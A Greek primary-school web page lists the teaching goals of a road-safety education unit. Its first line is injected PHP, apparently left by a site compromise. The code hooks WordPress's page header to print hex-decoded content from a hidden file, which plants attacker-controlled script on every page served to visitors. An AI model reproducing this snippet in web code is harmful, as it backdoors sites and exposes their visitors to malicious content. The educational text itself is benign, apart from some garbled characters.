if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Κυκλοφοριακή Αγωγή |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Κυκλοφοριακή Αγωγή

Οι διδακτικοί στόχοι που μπορούν να εξυπηρετηθούν μέσω της Κυκλοφοριακής Αγωγής είναι οι εξής:

 

1. Γνωστικοί

  • Να γνωρίσουν οι μαθητές τι σημαίνει «Κυκλοφοριακή Αγωγή».
  • Να αντιληφθούν με σαφήνεια πώς λειτουργούν τα σήματα και τι σημαίνει το καθένα.
  • Να μπορούν σε κάποια δεδομένη στιγμή να εφαρμόσουν με επιτυχία αυτά που θα μάθουν κατά τη διάρκεια της εργασίας.
  • Να αναγνωρίσουν τα λάθη στην οδική τους συμπεριφορά και να καταφέρουν να τα διορθώσουν.

 

2. Ψυχοκινητικοί

  • Ενεργοποίηση όλων των αισθήσεων των παιδιών με εργασίες δημιουργικές, θεατρικό παιχνίδι και άλλες δραστηριότητες.

 

3. Συναισθηματικοί

  • Να ευαισθητοποιηθούν τα παιδιά σε διάφορα θέματα Κυκλοφοριακής Αγωγής.
  • Να αποκτήσουν κυκλοφοριακή συνείδηση.
  • Να αποκτήσουν θετική στάση στα θέματα οδικής ασφάλειας.

 

4. Κοινωνικοί

  • Εργασία σε ομάδες.
  • Ανάπτυξη πρωτοβουλιών από τους μαθητές.
  • Αρμονική συνεργασία και ανάπτυξη δημιουργικής εργασίας.
  • Με αφορμή την ανάγνωση ενός κειμένου από το βιβλίο Σαμπέ-Γκοσίνι «ο μικρός Νικόλας έχει προβλήματα. Προβληματισμός συζήτηση με θέμα «τα τροχαία ατυχήματα και πώς να τα αποφύγουμε
  • Αναζήτηση άλλων κειμένων από το διαδίκτυο ? εφημερίδες ? κείμενο Καββαθά από τα βιβλία της Ε.Ζ, Ε? και ΣΤ
  • Χωρισμός σε ομάδες ? ερευνούν καταγράφουν ? σκέπτονται – επικοινωνούν